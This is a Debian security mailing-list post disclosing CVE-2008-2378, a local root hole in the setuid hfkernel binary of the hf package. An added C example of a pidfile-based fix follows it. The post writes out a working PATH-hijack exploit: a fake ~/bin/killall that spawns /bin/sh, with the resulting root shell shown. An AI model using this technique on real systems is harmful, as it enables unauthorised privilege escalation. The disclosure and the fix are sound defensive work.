[Secure-testing-team] hf - CVE-2008-2378 - local root exploit
Steve Kemp
skx at debian.org
Sat Nov 1 10:38:30 UTC 2008
The hf package, described by Debian as an amateur-radio protocol suite
using a soundcard as a modem, is a program that eventually becomes
setuid(0), and has a trivial security hole in it.
By default the package installs "/usr/bin/hfkernel" as a typical binary,
but when first started via the program "hf" the binary is changed to
be setuid(root).
This is demonstrated:
skx at gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.
If you do start the program as root the permissions are changed:
skx at gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...
Now the program is setuid:
skx at gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel
Unfortunately the hfkernel program contains a trivial root hole:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* getopt() */

int main(int argc, char *argv[])
{
    int c;
    /* snip */
    while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1) {
        switch (c) {
        /* snip */
        case 'k':
            /* runs via /bin/sh -c, so "killall" is resolved through the
               invoking user's $PATH while the process is euid 0 */
            system("killall hfkernel");
            break;
        /* snip */
        }
    }
}
Creating ~/bin/killall is sufficient to gain root privileges.
skx at gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx at gold:~$ chmod 755 ~/bin/killall
skx at gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)
This has been given the identifier CVE-2008-2378.
Below is the patch that I've come up with to fix this hole, which
is a simple pidfile approach. Unless anybody has any comments
I'll upload a fix for Etch on Monday/Tuesday.
Steve
--
[Attachment: hf.diff (text/x-diff, 4000 bytes)]
http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20081101/acf2697f/attachment.diff
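The attached hf.diff is not reproduced in the archive. What follows is an added example, not that patch and not hf's own code, of the shape a pidfile-based replacement for the 'k' option takes: the pid is read from a file and signalled with kill(2), so no shell runs and nothing in the invoking user's $PATH is consulted while the process is euid 0. The pidfile location HF_PIDFILE and the function names read_pidfile() and stop_hfkernel() are assumptions for this illustration; the demo in main() forks a child to stand in for a running hfkernel.

```c
/* Added example for CVE-2008-2378: a pidfile-based replacement for
 * system("killall hfkernel") in a setuid-root program. This is not the
 * attached hf.diff and not hf's own code; HF_PIDFILE, read_pidfile()
 * and stop_hfkernel() are names assumed for this illustration. */
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define HF_PIDFILE "/var/run/hfkernel.pid"   /* assumed location */

/* Write a short text file; used here to create pidfiles. 0 on success. */
int write_text(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    int rc = (fputs(text, f) < 0) ? -1 : 0;
    if (fclose(f) != 0)
        rc = -1;
    return rc;
}

/* Parse a pidfile strictly: one decimal pid >= 2, optionally followed by
 * whitespace. Returns the pid or -1 on missing or malformed input, so a
 * corrupted file can never turn into kill(0, ...) or kill(-1, ...), which
 * as root would signal every process on the system. */
pid_t read_pidfile(const char *path)
{
    char buf[32];
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    char *line = fgets(buf, sizeof buf, f);
    fclose(f);
    if (line == NULL)
        return -1;

    char *end;
    errno = 0;
    long v = strtol(buf, &end, 10);
    if (errno != 0 || end == buf || v < 2 || v > INT_MAX)
        return -1;
    while (*end == '\n' || *end == '\r' || *end == ' ' || *end == '\t')
        end++;
    if (*end != '\0')
        return -1;
    return (pid_t)v;
}

/* What the 'k' option can do instead of system(): signal the recorded pid
 * with kill(2). No shell is spawned and no $PATH lookup happens, so the
 * invoking user's environment cannot choose which program runs as root.
 * Returns 0 on success, -1 otherwise. */
int stop_hfkernel(const char *pidfile)
{
    pid_t pid = read_pidfile(pidfile);
    if (pid < 0)
        return -1;
    return kill(pid, SIGTERM) == 0 ? 0 : -1;
}

/* Stand-alone demo: fork a child standing in for hfkernel, record its pid
 * in a constructed pidfile under /tmp, and stop it through the pidfile. */
int main(void)
{
    const char *pidfile = "/tmp/hf_example_demo.pid";  /* constructed */
    pid_t child = fork();
    if (child < 0) {
        perror("fork");
        return 1;
    }
    if (child == 0) {
        for (;;)
            pause();   /* wait for the SIGTERM */
    }
    char line[32];
    snprintf(line, sizeof line, "%ld\n", (long)child);
    if (write_text(pidfile, line) != 0) {
        perror("pidfile");
        kill(child, SIGKILL);
        return 1;
    }
    int rc = stop_hfkernel(pidfile);
    int status = 0;
    waitpid(child, &status, 0);
    unlink(pidfile);
    printf("stop_hfkernel: %d, child got SIGTERM: %s\n", rc,
           (WIFSIGNALED(status) && WTERMSIG(status) == SIGTERM) ? "yes" : "no");
    return rc == 0 ? 0 : 1;
}
```

The pidfile only removes the $PATH problem if it lives in a root-owned directory that unprivileged users cannot write to; otherwise the file's contents become the next attacker-controlled input to a root-privileged kill(), which is why read_pidfile() rejects anything other than a single pid of 2 or more.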